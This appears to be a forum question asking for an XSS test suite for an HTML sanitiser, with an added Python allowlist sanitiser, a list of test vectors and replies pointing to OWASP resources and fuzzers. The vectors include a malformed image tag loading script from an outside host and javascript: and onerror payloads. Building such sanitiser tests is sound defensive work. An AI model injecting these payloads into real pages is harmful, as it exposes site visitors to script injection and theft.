XSS torture test - does it exist?
I'm looking to write an HTML sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror:
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
I know there's a Mime Torture Test which comprises several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivalent for XSS, i.e. a list of examples of dodgy HTML that I can throw at my sanitiser just to make sure it works OK.
If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.
Thanks in advance :-)
Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.
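Added example (not from the question, the answers or Coding Horror): one way to structure the two halves of what the question asks for, an allowlist-based sanitiser and a unit-test-style torture run over it, in Python. The allowlist, the SAFE_SCHEMES set and the DANGEROUS heuristic are assumptions for illustration; the first vector is the Coding Horror sample quoted above and the other three are constructed.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse
ALLOWED_TAGS = {"b", "i", "p", "a", "img"}                # hypothetical allowlist
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"", "http", "https"}                      # "" = relative URL
class AllowlistSanitiser(HTMLParser):  # re-emits only allowlisted tags/attributes
    def __init__(self):
        super().__init__(convert_charrefs=True)  # &#106;avascript: is decoded before our check
        self.out, self.skip = [], 0              # skip > 0 while inside <script>/<style>
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif tag in ALLOWED_TAGS and not self.skip:
            kept, seen = [], set()
            for name, value in attrs:
                if name in seen or value is None or name not in ALLOWED_ATTRS.get(tag, ()):
                    continue
                seen.add(name)  # first occurrence wins, as browsers do with duplicate attributes
                if name in ("href", "src"):
                    value = re.sub(r"[\x00-\x20\x7f]", "", value)  # browsers ignore these in URLs
                    if urlparse(value).scheme.lower() not in SAFE_SCHEMES:
                        continue  # drops javascript:, data:, vbscript: and friends
                kept.append(f' {name}="{escape(value, quote=True)}"')
            self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_startendtag(self, tag, attrs):  # <img ... /> is just a start tag for us
        self.handle_starttag(tag, attrs)
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))  # text can never re-open a tag
def sanitise(html: str) -> str:
    p = AllowlistSanitiser()
    p.feed(html); p.close()
    return "".join(p.out)
TORTURE = [  # constructed vectors: the Coding Horror sample from the question plus three common shapes
    '<img src=""http://www.a.com/a.jpg<script type=text/javascript\nsrc="http://1.2.3.4:81/xss.js">" /><<img\nsrc=""http://www.a.com/a.jpg</script>"',
    '<a href="javascript:alert(1)">x</a>',
    '<img src=x onerror=alert(1)>',
    '<p>hello<script>alert(1)</script> world</p>',
]
DANGEROUS = re.compile(r'<script|\son\w+\s*=|=["\']?\s*javascript:', re.I)  # heuristic only
def run_torture(vectors=TORTURE):  # -> [(sanitised output, passed)] per vector
    return [(out, DANGEROUS.search(out) is None) for out in map(sanitise, vectors)]
```

The exact output for the Coding Horror vector depends on how html.parser tokenises the malformed tag, which is the point of a torture test: assert on properties (no script tag, event handler or javascript: URL survives), not on one hard-coded string.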
Comments (4)
Take a look at this XSS Cheat List: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
XSS Me is a great Firefox plugin you can run against your sanitizer.
Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.
You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your Javascript trying to break it. It seems the Firefox team has used this with great success.